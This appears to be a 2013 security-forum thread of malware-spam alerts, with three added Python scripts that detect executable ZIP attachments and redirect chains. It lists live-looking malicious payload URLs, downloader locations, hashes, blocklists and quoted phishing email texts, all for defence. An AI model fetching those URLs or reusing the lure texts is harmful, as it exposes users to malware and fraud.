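The Wells Fargo "CEO Portal" write-up quoted a few posts up ends with the advice to block EXE-in-ZIP attachments at the perimeter, and the Booking.com write-up in this post shows the double-extension trick ("BOOKING ISSUED 18.Aug.2013.pdf.exe") that a naive extension check on the displayed name can miss. The following Python is an added editorial example, not code from Dynamoo, ThreatTrack or any other quoted source; it inspects a ZIP archive in memory and reports members that carry an executable extension, hide one behind a document extension, or start with the PE "MZ" header under a harmless-looking name. The sample archive is constructed inline from a fake MZ stub (padding, not a real program) using the attachment names the posts report.

```python
import io
import zipfile
from dataclasses import dataclass
from typing import Dict, List

# Extensions Windows will run directly once the archive is unpacked and the file opened.
EXECUTABLE_EXTENSIONS = {".exe", ".scr", ".pif", ".com", ".bat", ".cmd"}
# Document-style extensions abused in double-extension names such as "file.pdf.exe".
DOCUMENT_EXTENSIONS = {".pdf", ".doc", ".docx", ".xls", ".xlsx", ".txt", ".jpg"}
PE_MAGIC = b"MZ"  # first two bytes of every Windows PE executable


@dataclass
class Finding:
    member: str
    reason: str


def inspect_zip_bytes(data: bytes) -> List[Finding]:
    """Report archive members that are, or look like, Windows executables."""
    findings: List[Finding] = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            name = info.filename
            parts = name.lower().rsplit("/", 1)[-1].split(".")
            ext = "." + parts[-1] if len(parts) > 1 else ""
            try:
                with zf.open(info) as fh:
                    head = fh.read(len(PE_MAGIC))
            except RuntimeError:
                # Encrypted member: the content cannot be inspected, so treat it as suspicious.
                findings.append(Finding(name, "encrypted member, content not inspectable"))
                continue
            if ext in EXECUTABLE_EXTENSIONS:
                reason = "executable extension"
                if len(parts) > 2 and "." + parts[-2] in DOCUMENT_EXTENSIONS:
                    reason += " hidden behind a document extension"
                findings.append(Finding(name, reason))
            elif head == PE_MAGIC:
                findings.append(Finding(name, "PE header (MZ) under a non-executable name"))
    return findings


def should_block(data: bytes) -> bool:
    """Perimeter decision: block the archive if any member looks executable."""
    return bool(inspect_zip_bytes(data))


def zip_from_members(members: Dict[str, bytes]) -> bytes:
    """Build an in-memory ZIP archive from {member name: content} (test fixture helper)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, content in members.items():
            zf.writestr(name, content)
    return buf.getvalue()


# Constructed sample: a fake PE stub (MZ header plus padding), not a real program.
FAKE_PE = PE_MAGIC + b"\x00" * 62 + b"constructed stub, not a real binary"
SAMPLE_MEMBERS = {
    "report_{DIGIT[12]}.exe": FAKE_PE,               # plain EXE-in-ZIP, as in the Wells Fargo spam
    "BOOKING ISSUED 18.Aug.2013.pdf.exe": FAKE_PE,   # double extension, as in the Booking.com spam
    "invoice.pdf": FAKE_PE,                          # PE content under a document name
    "readme.txt": b"plain text, harmless",
}

if __name__ == "__main__":
    for finding in inspect_zip_bytes(zip_from_members(SAMPLE_MEMBERS)):
        print(f"{finding.member}: {finding.reason}")
```

The magic-byte check is what catches the third member: an icon or a document-like name says nothing about the content, which is exactly the trick the "Instructions Secured E-mail.exe with an icon to make it look like a PDF file" sample relied on. Encrypted members cannot be read without the password, so the only safe perimeter policy is to treat them as blocked too.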

AplusWebMaster
2013-08-20, 17:02
FYI...

Fake Browser Updates drop Shylock Malware
- http://www.threattracksecurity.com/it-blog/fake-browser-updates-drop-shylock-malware/
August 19, 2013 - "We’re no stranger to fake and often malicious Internet browsers* that are served up on equally fake and malicious Web sites. These latest samples found by... our threat researchers in the AV Labs, are hosted on the domain, browseratrisk(dot)com. It is found that once users access pages on this malicious domain with either Internet Explorer (IE), Firefox or Chrome, it opens a fake “update” page for the said browsers and auto-downloads the fake files. Below are screenshots of these pages:
> http://www.threattracksecurity.com/it-blog/wp-content/uploads/2013/08/ff-shylock-wm.jpg
> http://www.threattracksecurity.com/it-blog/wp-content/uploads/2013/08/chrome-shylock-wm.jpg
> http://www.threattracksecurity.com/it-blog/wp-content/uploads/2013/08/ie-shylock-wm.jpg
... Users may find it difficult to close and navigate to other tabs after download, thanks to certain loop commands on the page’s code, which we’ve seen before**. If users choose to install the downloaded fake browser updates, it then drops a variant of either Sirefef or Shylock/Caphaw malware... Win32.Malware!Drop... Shylock had hit the news in January of this year as the banking Trojan capable of using Skype chat to spread. Note that the dropped file may change at roughly every three to four hours. The website server is also known to house Blackhole Exploit kits... If users access browseratrisk(dot)com via their mobile devices and on OSX, they are redirected to FriendFinder, a popular online dating service, via the mirror site, stealthtec(dot)net. When it comes to software updates, it pays to be wary of random sites claiming your current Internet browser needs to be updated. It is best to -ignore- these pages and go straight to official pages..."
* http://www.threattracksecurity.com/it-blog/?s=browser&x=12&y=21

** http://www.threattracksecurity.com/it-blog/fake-critical-browser-update-site-serves-malware/

:mad: :fear:

AplusWebMaster
2013-08-21, 15:47
FYI...

Fake Facebook SPAM / dennissellsgateway .com
- http://blog.dynamoo.com/2013/08/facebook-spam-dennissellsgatewaycom.html
21 August 2013 - "This fake Facebook spam leads to malware on dennissellsgateway .com:
Date: Tue, 20 Aug 2013 15:28:11 -0500 [16:28:11 EDT]
From: Facebook [no-reply @facebook .com]
Subject: Gene Maynard wants to be friends with you on Facebook.
facebook
Gene Maynard wants to be friends with you on Facebook.
University of Houston, Victoria
342 friends - 28 photos
Confirm Request
See All Requests
This message was sent to [redacted]. If you don't want to receive these emails from Facebook in the future, please click: unsubscribe.
Facebook, Inc. Attention: Department 415 P.O Box 10005 Palo Alto CA 94303

This is a "ThreeScripts" attack, with the link first going to a legitimate -hacked- site and then through one of the following three scripts:
[donotclick]ftp.crimestoppersofpinellas .org/jonson/tried.js
[donotclick]italiangardensomaha .com/moocher/pawned.js
[donotclick]www.it-planet .gr/schlepped/suitor.js
From there, the victim ends up on a -hijacked- GoDaddy domain with a malicious payload at [donotclick]dennissellsgateway .com/topic/able_disturb_planning.php on 72.5.102.146 (Nuclear Fallout Enterprises, US) along with some other hijacked domains...
Recommended blocklist:
72.5.102.146
dennissellsgateway .com
justinreid .us
waterwayrealtyteam .us
www.it-planet .gr
italiangardensomaha .com
ftp.crimestoppersofpinellas .org "

>> Update: Another spam is circulating with a different pitch, but the -same- malicious payload:
Dear Customer,
The following is your Credit Card settlement report for Monday, August 19, 2013.
Transaction Volume Statistics for Settlement Batch dated 19-Aug-2013
Batch ID: 108837538
Business Day: 19-Aug-2013
Net Batch Total: 3704.75 (USD)
Number of Charge Transactions: 1
Amount of Charge Transactions: 3704.75
Number of Refund Transactions: 5
Amount of Refund Transactions: 315.74
You can download your full report ...

- https://www.virustotal.com/en/ip-address/72.5.102.146/information/
___

Fake Malwarebytes scammer surveys ...
- http://blog.malwarebytes.org/news/2013/08/fake-malwarebytes-scammer-surveys-victims/
August 20, 2013 - "... a twitter account pretending to be speaking for Malwarebytes. The twitter account, @ malwarebytesx, has posted heavily over the last couple days about Malwarebytes Anti-Malware being available (both legitimately and a cracked version) at a posted link. They even created a variation of our logo and got 51 people to follow them! The link leads to a blogspot page titled “Malwarebytes Anti-Malware 1.75 Full + Serial” that is covered in our signage and provides a link to download “Malwarebytes Anti-Malware” with text and graphics directly from our own website.
> http://cdn.blog.malwarebytes.org/wp-content/uploads/2013/08/MalwareAMBlog-1024x810.png
After clicking on the “Download Now” button, you are presented with a download page requesting a small favor.
> http://cdn.blog.malwarebytes.org/wp-content/uploads/2013/08/MalwareAMOFfer.png
... Unfortunately for anyone who has fallen for this scam, this website does -not- belong to Malwarebytes nor is supported by one of our authorized distributors... Don’t become a victim and always download software from legitimate sites. Even if you just Google “Malware” or the phrase “Malware Removal,” legitimate sources to download our product are within the first few results. Tell your friends and if you encounter a survey site, maybe you should try finding your download somewhere else..."
___

Threat Outbreak Alerts
- http://tools.cisco.com/security/center/threatOutbreak.x?i=77
Malicious Attachment Email Messages - 2013 Aug 21
Fake Secure Message Notification Email Messages - 2013 Aug 21
Fake Confirmation of Payment Information Email Messages - 2013 Aug 21
Fake Money Transfer Notification Email Messages - 2013 Aug 21
Malicious Personal Pictures Attachment Email Messages - 2013 Aug 21
Fake UPS Parcel Notification Email Messages - 2013 Aug 21
Fake Product Solicitation Email Messages - 2013 Aug 21
Fake Product Purchase Request Email Messages - 2013 Aug 21
Fake Money Transfer Notification Email Messages - 2013 Aug 21
(More detail and links at the cisco URL above.)
___

Fake Facebook SPAM / thenatemiller.co
- http://blog.dynamoo.com/2013/08/facebook-spam-thenatemillerco.html
21 August 2013 - "This fake Facebook spam leads to malware on thenatemiller .co:
Date: Wed, 21 Aug 2013 22:05:38 +0530 [12:35:38 EDT]
From: Facebook [update+hiehdzge@ facebookmail .com]
Subject: You requested a new Facebook password
facebook
Hello,
You recently asked to reset your Facebook password.
Click here to change your password.
Didn't request this change?
If you didn't request a new password, let us know immediately.
Change Password
This message was sent to [redacted] at your request.
Facebook, Inc., Attention: Department 415, PO Box 10005, Palo Alto, CA 94303

Nothing good will come from clicking the link. First victims go to a legitimate but -hacked- site that attempts to load the following three scripts:
[donotclick]gemclinicstore .com/admitted/tintinnabulations.js
[donotclick]mathenyadvisorygroup .com/toffies/ceiling.js
[donotclick]www.it-planet .gr/schlepped/suitor.js
From there the victim is directed to a malware landing page at [donotclick]thenatemiller .co/topic/able_disturb_planning.php (.co, not .com) which is a hijacked GoDaddy domain hosted on 72.5.102.146 (Nuclear Fallout Enterprises, US) along with several other hijacked domains...
Recommended blocklist:
72.5.102.146
successchamp .com
dennissellsgateway .com
thenatemiller .co
thenatemiller .info
justinreid .us
waterwayrealtyteam .us
thenatemiller .biz
gemclinicstore .com
mathenyadvisorygroup .com
www.it-planet .gr ..."

- https://www.virustotal.com/en/ip-address/72.5.102.146/information/

:mad: :fear:
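Added example (my own detection sketch, not code from dynamoo or any of the quoted sources): the two Facebook spam runs above share the same "ThreeScripts" shape, a hacked site that pulls three .js files from three unrelated hosts and then sends the browser to a /topic/able_disturb_planning.php landing page on yet another host. That shape is visible in a web proxy log even when the hostnames change, so the script below flags both the exact landing path quoted in the posts and the generic pattern (three or more distinct script hosts followed within a short window by a .php page on a host not among them). The log lines and their format ("<ISO time> <client> <method> <url> <status>") are constructed for the example; the window and threshold values are assumptions to tune locally.

```python
"""Flag the ThreeScripts redirect chain in a simple proxy log."""
from collections import defaultdict
from datetime import datetime, timedelta
from urllib.parse import urlsplit

# Constructed sample log (not real traffic). Client 10.1.2.30 reproduces the
# chain described above; 10.1.2.31 is ordinary browsing; 10.1.2.32 hits the
# known landing path directly.
SAMPLE_LOG = """\
2013-08-21T15:28:40Z 10.1.2.30 GET http://hacked-site.example/index.html 200
2013-08-21T15:28:41Z 10.1.2.30 GET http://ftp.crimestoppersofpinellas.org/jonson/tried.js 200
2013-08-21T15:28:41Z 10.1.2.30 GET http://italiangardensomaha.com/moocher/pawned.js 200
2013-08-21T15:28:42Z 10.1.2.30 GET http://www.it-planet.gr/schlepped/suitor.js 200
2013-08-21T15:28:44Z 10.1.2.30 GET http://dennissellsgateway.com/topic/able_disturb_planning.php 200
2013-08-21T15:30:01Z 10.1.2.31 GET http://cdn.shop.example/jquery.js 200
2013-08-21T15:30:02Z 10.1.2.31 GET http://www.shop.example/app.js 200
2013-08-21T15:30:05Z 10.1.2.31 GET http://www.shop.example/login.php 200
2013-08-21T16:01:00Z 10.1.2.32 GET http://thenatemiller.co/topic/able_disturb_planning.php 200
"""

# Landing-page path quoted in the posts above.
KNOWN_LANDING_PATHS = {"/topic/able_disturb_planning.php"}


def parse_line(line: str) -> dict:
    """Split one constructed log line into its fields."""
    ts, client, method, url, status = line.split()
    return {
        "time": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"),
        "client": client,
        "method": method,
        "url": url,
        "status": int(status),
    }


def detect_chain(log_text: str, window_seconds: int = 30, min_script_hosts: int = 3) -> list:
    """Return one alert per suspicious landing-page request, with the script
    fetches that preceded it from the same client inside the window."""
    recent = defaultdict(list)   # client -> [(time, host, url)] of recent .js fetches
    alerts = []
    records = [parse_line(l) for l in log_text.splitlines() if l.strip()]
    for rec in sorted(records, key=lambda r: r["time"]):   # stable: ties keep log order
        parts = urlsplit(rec["url"])
        path, host, client = parts.path.lower(), parts.hostname, rec["client"]
        cutoff = rec["time"] - timedelta(seconds=window_seconds)
        recent[client] = [r for r in recent[client] if r[0] >= cutoff]
        if path.endswith(".js"):
            recent[client].append((rec["time"], host, rec["url"]))
            continue
        reasons = []
        if path in KNOWN_LANDING_PATHS:
            reasons.append("known_landing_path")
        script_hosts = {h for _, h, _ in recent[client]}
        if (path.endswith(".php") and len(script_hosts) >= min_script_hosts
                and host not in script_hosts):
            reasons.append("script_fanout_then_php")
        if reasons:
            alerts.append({"client": client, "url": rec["url"], "reasons": reasons,
                           "scripts": [u for _, _, u in recent[client]]})
    return alerts


if __name__ == "__main__":
    for alert in detect_chain(SAMPLE_LOG):
        print(alert["client"], alert["url"], ",".join(alert["reasons"]))
        for script in alert["scripts"]:
            print("   preceded by", script)
```

The generic rule is the useful half: the exact path is trivial for the gang to rename, whereas "scripts from several unrelated hosts followed by a .php on a fourth" is the structure of the redirect itself. Expect to tune min_script_hosts and the window against your own traffic, since tag-heavy sites can produce similar fan-out.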

AplusWebMaster
2013-08-22, 22:45
FYI...

Fake Red Sox Baseball SPAM / lindoliveryct .net
- http://blog.dynamoo.com/2013/08/red-sox-baseball-spam-lindoliveryctnet.html
22 Aug 2013 - "This fake Red Sox spam leads to malware on lindoliveryct .net:
Date: Thu, 22 Aug 2013 13:02:19 -0400 [13:02:19 EDT]
From: ticketoffice@ inbound.redsox .com
Subject: Thank You for your order. ( RSXV - 4735334 - 0959187 )
Thank you for your recent ticket purchase. We truly appreciate your support and commitment to Red Sox Baseball. If you have any questions regarding your purchase, please contact our Ticket Services department by calling (toll free) 877-REDSOX9.
Note that you will receive a separate email within the next two business days which will include the vouchers you will need for both parking at the Prudential Center and your Duck Boat ride to the ballpark, included in each End of Summer Family Pack purchase.
Please remember that all sales are final-there are no refunds or exchanges issued on any tickets. Also note that all game times are subject to change. Be sure to visit redsox.com for the latest Red Sox news and any game time updates.
Thanks again! We look forward to seeing you at the ballpark this season.
Boston Red Sox Ticketing Department...

Screenshot: https://1.bp.blogspot.com/-B_1VXJv600M/UhZUOCcg2NI/AAAAAAAABy0/pskZHcKamYw/s1600/redsox.png

The link goes through a legitimate -hacked- site (in this case using a WordPress flaw) and ends up on [donotclick]www.redsox .com.tickets-service.lindoliveryct.net/news/truck-black.php (report here*) which is actually the domain lindoliveryct .net rather than redsox .com... The WHOIS details for this domain are fake and indicate it is the work of the Amerika gang...
The malicious domain is multihomed on the following IPs which host several other malicious domains:
66.230.163.86 (Goykhman And Sons LLC, US)
86.183.191.35 (BT, UK)
188.134.26.172 (Perspectiva Ltd, Russia)
Recommended blocklist:
66.230.163.86
86.183.191.35
188.134.26.172 ..."
* http://urlquery.net/report.php?id=4682777
___

Chase Bank Remittance Spam
- http://threattrack.tumblr.com/post/59019303653/chase-bank-remittance-spam
Aug 22, 2013 - "Subjects Seen:
Remittance Docs <random>
Typical e-mail details:
Please find attached the remittance If you are unable to open the attached file, please reply to this email with a contact telephone number.
The Finance Dept will be in touch in due course.
Vanessa_Rodriquez
Chase Private Banking

Malicious URLs
watch-fp .ca/ponyb/gate.php
watch-fp .com/ponyb/gate.php
watch-fp .info/ponyb/gate.php
watch-fp .mobi/ponyb/gate.php
jatw.pacificsocial .com/VSMpZX.exe
richardsonlookoutcottages .nb .ca/Q5Vf.exe
riplets .net/Qa7nXVT.exe

Malicious File Name and MD5:
Docs_<name>.zip (37A1C5AC9C0090A07F002B0A2ED57D3D)
Docs_<date>.exe
(E9FBB397E66B295F5E43FE0AA3B545D7)

- Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/95eb6272862e0babe9ce34ae12e67471/tumblr_inline_mrxy44WuCD1qz4rgp.png
___

Discover Card Account Information Update Spam
- http://threattrack.tumblr.com/post/59025861611/discover-card-account-information-update-spam
Aug 22, 2013 - "Subjects Seen:
Your account login information updated
Typical e-mail details:
Dear Customer,
This e-mail is to confirm that you have updated your log-in information for Discover.com. Please remember to use your new information the next time you log in.
Log In to review your account details or to make additional changes.

Malicious URLs
aywright .com/parables/index.html
intuneuk .com/aspell/index.html
flagitak .poznan.pl/deceptiveness/index.html
carpentryunlimitedvermont .com/slangy/index.html
labs-srl .it/misquotations/index.html
75.103.99.168 /superintend/index.html
watch-fp .ca/topic/able_disturb_planning.php

- Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/cc1d603ab8252f6a9904c26826e4f11b/tumblr_inline_mry2hgeDjI1qz4rgp.png

- http://blog.dynamoo.com/2013/08/discover-card-your-account-login.html
22 August 2013 - "This fake Discover card spam leads to malware on abemuggs .com:
Date: Thu, 22 Aug 2013 16:14:59 +0000 [12:14:59 EDT]
From: Discover Card [no-reply@ facebook .com]
Subject: Your account login information updated
Discover
Access My Account
ACCOUNT CONFIRMATION Statements | Payments | Rewards
Your account login information has been updated.
Dear Customer,
This e-mail is to confirm that you have updated your log-in information for Discover.com. Please remember to use your new information the next time you log in.
Log In to review your account details or to make additional changes...

Screenshot: https://3.bp.blogspot.com/-yFKra6yjZxQ/UhZqLgXefaI/AAAAAAAABzM/PbOV1lEPdbE/s1600/discover-card2.png

The link in the email uses the Twitter redirection service to go to [donotclick]t. co/9PsnfeL8hh then [donotclick]x .co/1neIk then [donotclick]activegranite.com/vocatives/index.html and finally to a set of three scripts as follows:
[donotclick]02aa198 .netsolhost .com/frostbite/hyde.js
[donotclick]96.9.28.44 /dacca/quintilian.js
[donotclick]cordcamera.dakisftp .com/toothsome/catch.js
From this point the victim ends up at the malicious payload at [donotclick]abemuggs .com/topic/able_disturb_planning.php which is a hijacked GoDaddy domain hosted on 74.207.253.139 (Linode, US).
At the moment, I can only see abemuggs .com active on 74.207.253.139, however other domains in the same GoDaddy account may be hijacked as well. If you see unexpected traffic going to the following domains then it may be malicious:
abemuggs .com
abesmugs .com
abemugs .com
andagency .com
mytotaltitle .com
I would strongly recommend the following blocklist:
74.207.253.139
96.9.28.44
abemuggs .com
02aa198.netsolhost .com
cordcamera.dakisftp .com "

- https://www.virustotal.com/en/ip-address/74.207.253.139/information/

- https://www.virustotal.com/en/ip-address/96.9.28.44/information/
___

Fake Remittance Docs SPAM / Docs_08222013_218.exe
- http://blog.dynamoo.com/2013/08/remittance-docs-2982780-spam.html
22 August 2013 - "This fake Chase spam has a malicious attachment:
Date: Thu, 22 Aug 2013 10:00:33 -0600 [12:00:33 EDT]
From: Jed_Gregory [Jed_Gregory@ chase .com]
Subject: Remittance Docs 2982780
Please find attached the remittance 2982780.
If you are unable to open the attached file, please reply to this email with a contact telephone number. The Finance Dept will be in touch in due course.
Jed_Gregory
Chase Private Banking Level III Officer
3 Times Square
New York, NY 10036 ...

The attachment is in the format Docs_victimdomain .com.zip which contains an executable Docs_08222013_218.exe (note that the date is encoded into the file). The VirusTotal detection rate for this is a moderate 16/46*. The Malwr analysis** shows that this is a Pony/Gate downloader which attempts to connect to the following URLs:
[donotclick]watch-fp .ca/ponyb/gate.php
[donotclick]www.jatw.pacificsocial .com/VSMpZX.exe
[donotclick]richardsonlookoutcottages .nb .ca/Q5Vf.exe
[donotclick]idyno.com .au/kvdhx2.exe
The downloader then downloads a second part with a much lower detection rate of 6/46***. This appears to be a Zbot variant... The Pony/Gate component is hosted on 72.5.102.146 (Nuclear Fallout Enterprises, US) and is a hijacked GoDaddy domain, one of several on that server...
Recommended blocklist:
72.5.102.146 ..."
* https://www.virustotal.com/en/file/d4ef6d13b24a41dc7f10ef93b0c4580a1553d8512a7a97b3c32b25b0d49ab464/analysis/1377201922/

** https://malwr.com/analysis/YTNiNzMwZjUyZjMxNGE4ODhmNDJlZGFiYjY4YjU3ZmY/

*** https://www.virustotal.com/en/file/33f5e03f5d35274f58cb67fff503b0d9087c73d1019fedbf4261938b7e441d1d/analysis/1377202683/

- https://www.virustotal.com/en/ip-address/72.5.102.146/information/

:fear: :mad:

AplusWebMaster
2013-08-23, 20:43
FYI...

Fake Wells Fargo SPAM / WellsFargo_08232013.exe
- http://blog.dynamoo.com/2013/08/wells-fargo-spam-wellsfargo08232013exe.html
23 August 2013 - "This fake Wells Fargo spam has a malicious attachment:
Date: Fri, 23 Aug 2013 09:43:44 -0500 [10:43:44 EDT]
From: Morris_Osborn@ wellsfargo .com
Please review attached documents.
Morris_Osborn
Wells Fargo Advisors
817-718-8096 office
817-610-5531 cell Morris_Osborn@ wellsfargo .com
Investments in securities and insurance products are:
NOT FDIC-INSURED/NO BANK-GUARANTEES/MAY LOSE VALUE
Wells Fargo Advisors, LLC is a nonbank affiliate of Wells Fargo & Company, Member
FINRA/SIPC. 1 North Jefferson, St. Louis, MO 63103...

In this case there is an attachment WellsFargo.victimname.zip which contains a malicious executable WellsFargo_08232013.exe (note the date is encoded into the filename). The VirusTotal detection rate is just 4/45*, but the file itself is unusually small (just 21Kb unzipped, 8Kb zipped) when I would normally expect to see the executable closer to 100Kb for this sort of malware. What does it do? Well, the automated reports show it rummaging through various browser and address book data, and the ThreatTrack report [pdf**] shows a DNS lookup of the domain huyontop.com plus what appears to be some peer-to-peer activity... The WHOIS details for the domain huyontop .com appear to be valid (I won't list them here, look them up if you want), however it was only registered a few days ago. I can't tell you exactly what it is doing, but I would treat huyontop .com as being potentially malicious and block it if you can."
* https://www.virustotal.com/en/file/b4d8e2fdb88a3d94dd421e5f0a016cb9cd37e202bc57b7cad5ecd091c6335759/analysis/1377272785/

** http://www.dynamoo.com/files/analysis_32325_00949d04acead6bc20e1bc1acd09feb3.pdf

- https://www.virustotal.com/en/ip-address/216.194.165.222/information/
___

Orbit Downloader - DDoS component found
- https://net-security.org/malware_news.php?id=2570
Aug 23, 2013 - "... The DDoS component has been discovered by ESET researchers* while doing a routine examination of the software, and subsequent analysis of previous versions has shown that it was added to orbitDM.exe sometime between the release of version 4.1.1.14 (December 25, 2012) and version 4.1.1.15 (January 10, 2013)... ESET has decided to make its AV software detect all versions of Orbit Downloader with DoS functionality. Trend Micro, Kaspersky Lab and Ikarus decided to follow suit, at least for the latest version of OD. Users are advised to deinstall the software and choose another one for their needs."

* http://www.welivesecurity.com/2013/08/21/orbital-decay-the-dark-side-of-a-popular-file-downloading-tool/
21 Aug 2013

** https://www.virustotal.com/en/file/18756d11b3c62654e2409d1340a8114fbd471f114420e5ba7735a7363cf23ec6/analysis/

:mad::fear:
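Added example (mine, not from dynamoo or ThreatTrack): the Chase "Remittance Docs" and Wells Fargo runs above both ship a zip whose executable carries the send date in its name (Docs_08222013_218.exe, WellsFargo_08232013.exe), and the Wells Fargo post notes an unusually small executable. Those are cheap things for a mail gateway to check without running anything. The script below builds a sample zip in memory that mimics that shape (the .exe member is a stub carrying only an "MZ" header, constructed here, not a real program or anything from the posts) and reports, per member, an executable extension, a PE header regardless of extension, and a date stamp matching the day the mail arrived. The extension list and the one-day tolerance are my assumptions.

```python
"""Inspect a zip attachment for the date-stamped executable pattern seen in these posts."""
import io
import re
import zipfile
from datetime import date, datetime

# Assumed set of extensions a mail gateway would treat as directly executable.
EXECUTABLE_EXTENSIONS = {".exe", ".scr", ".pif", ".com", ".bat", ".cmd", ".js", ".vbs"}
# MMDDYYYY embedded in a filename, as in Docs_08222013_218.exe.
_DATE_RE = re.compile(r"(?<!\d)(\d{2})(\d{2})(\d{4})(?!\d)")


def build_sample_zip() -> bytes:
    """Constructed sample shaped like the Docs_<victimdomain>.zip attachment above.
    The .exe is a 302-byte stub: 'MZ' followed by zeros, nothing runnable."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("Docs_08222013_218.exe", b"MZ" + b"\x00" * 300)
        zf.writestr("readme.txt", b"constructed benign member\n")
    return buf.getvalue()


def inspect_attachment(zip_bytes: bytes, received: date) -> list:
    """Return a finding per suspicious member: name, uncompressed size, reasons."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            name = info.filename
            ext = "." + name.rsplit(".", 1)[-1].lower() if "." in name else ""
            with zf.open(info) as member:
                head = member.read(2)          # only the magic bytes, never the whole file
            reasons = []
            if ext in EXECUTABLE_EXTENSIONS:
                reasons.append("executable_extension")
            if head == b"MZ":                  # PE/DOS header, catches renamed executables
                reasons.append("pe_header")
            m = _DATE_RE.search(name)
            if m:
                try:
                    stamped = datetime.strptime(m.group(0), "%m%d%Y").date()
                except ValueError:
                    stamped = None
                if stamped is not None and abs((stamped - received).days) <= 1:
                    reasons.append("date_stamped_name")
            if reasons:
                findings.append({"name": name, "size": info.file_size, "reasons": reasons})
    return findings


def should_quarantine(findings: list) -> bool:
    """Hold the message if any member is executable by extension or by header."""
    return any({"executable_extension", "pe_header"} & set(f["reasons"]) for f in findings)


if __name__ == "__main__":
    results = inspect_attachment(build_sample_zip(), date(2013, 8, 22))
    for f in results:
        print(f["name"], f["size"], "bytes:", ", ".join(f["reasons"]))
    print("quarantine:", should_quarantine(results))
```

Reading only the first two bytes of each member keeps the check safe against oversized or zip-bomb style archives; the size is taken from the central directory rather than by decompressing, which is also where the "unusually small" observation from the Wells Fargo post would be applied as a local heuristic.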

AplusWebMaster
2013-08-27, 02:28
FYI...

Fake UPS SPAM / UPS Invoice 74458652.zip
- http://blog.dynamoo.com/2013/08/ups-spam-ups-invoice-74458652zip.html
26 August 2013 - "This fake UPS invoice has a malicious attachment:
From: "UPSBillingCenter @ups .com" [UPSBillingCenter@ ups .com]
Subject: Your UPS Invoice is Ready
New invoice(s) are available for the consolidated payment plan(s) / account(s) enrolled in the UPS Billing Center. Download the attachment. Invoice will be automatically shown by double click.

Attached is a file UPS Invoice 74458652 which in turn contains a file called UPS Invoice {DIGIT[8]}.exe which presumably isn't meant to be named like that...
The VirusTotal detection rate is a so-so 18/46*. The Malwr analysis** is that this is a trojan downloader that attempts to download bad things from the following locations:
[donotclick]gordonpoint .org/forum/viewtopic.php
[donotclick]mierukaproject .jp/PjSE.exe
[donotclick]programcommunications .com/WZP3mMPV.exe
[donotclick]fclww .com/QdytJso0.exe
[donotclick]www .lajen .cz/tPT8oZTB.exe
The VirusTotal detection rate for the downloaded file is not great at just 9/46***.
The domain gordonpoint .org is a hijacked GoDaddy domain on 74.207.229.45 (Linode, US) along with several other -hijacked- domains...
Recommended blocklist:
74.207.229.45
gordonpoint .org
hitechcreature .com
industryseeds .ca
infocreature .com
itanimal .com
itanimals .com
jngburgerjoint .ca
jngburgerjoint .com
johnmejalli .com
mierukaproject .jp
programcommunications .com
fclww .com
www .lajen .cz "
* https://www.virustotal.com/en/file/34f66782c3e014a66c4600b3ff41d14ebd98a435c16d01feb5964b21364c13ae/analysis/1377553766/

** https://malwr.com/analysis/NTE2MGRjODQzNTQzNGQ2NjliZDVhYjgxYzUzY2NlOTg/

*** https://www.virustotal.com/en/file/d9125bca0f771f43db6f50d5877c9f45d0e6bed83331fb71597bfbb98ee8d0c6/analysis/1377552510/

- https://www.virustotal.com/en/ip-address/74.207.229.45/information/
___

PayPal Protection Services Spam
- http://threattrack.tumblr.com/post/59424449055/paypal-protection-services-spam
Aug 26, 2013 - "Subjects Seen:
Resolution of case #<random>
Typical e-mail details:
Our records indicate that you never responded to requests for additional information about this claim. We hope you review the attached file and solve the situation amicably.
For more details please see on the page View all details
Sincerely,
Protection Services Department

Malicious URLs
8744f321834af6ba.lolipop .jp/monetary/index.html
scentsability .org/interlocks/index.html
batcoroadlinescorporation .com/misfire/index.html
gordonpoint .org/topic/able_disturb_planning.php

Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/cb09707a608c8202a7eab7570db2f066/tumblr_inline_ms5pg88gPk1qz4rgp.png

:fear::fear::mad:

AplusWebMaster
2013-08-27, 23:45
FYI...

Fake email - Threat Outbreak Alerts
- http://tools.cisco.com/security/center/threatOutbreak.x?i=77
Fake FedEx Parcel Delivery Failure Notification Email Message - 2013 Aug 27
Fake Money Transfer Notification Email Messages - 2013 Aug 27
Fake Bank Payment Notice Email Messages - 2013 Aug 27
Fake Account Payment Notification Email Messages - 2013 Aug 27
Fake Bank Payment Transfer Notification Email Messages - 2013 Aug 27
Fake Package Shipping Notification Email Messages - 2013 Aug 27
Fake Business Complaint Notification Email Messages - 2013 Aug 27
Fake Tax Return Information Email Messages - 2013 Aug 27
Email Messages with Malicious Attachments - 2013 Aug 27
Fake Product Purchase Order Request Email Messages - 2013 Aug 27
Fake Tax Documentation Email Messages - 2013 Aug 27
Fake Product Services Specification Request Email Messages - 2013 Aug 27
(More detail and links at the cisco URL above.)
___

UPS Email scam delivers Backdoor
- http://blog.trendmicro.com/trendlabs-security-intelligence/convincing-ups-email-scam-delivers-backdoor/
Aug 27, 2013 - "... most users can easily detect spammed messages, particularly those that attempt (and fail) at looking like legitimate email notifications... We recently found an email sample spoofing the popular mail courier service UPS. The email poses as a package delivery notification, containing links to the tracking site and .PDF copy of the shipping invoice. This is definitely not the first time we received such an email. However, what makes this spam stand out is the way it hides its true, malicious intent.
> https://blog.trendmicro.com/trendlabs-security-intelligence/files/2013/08/ups_spamrun_825.png
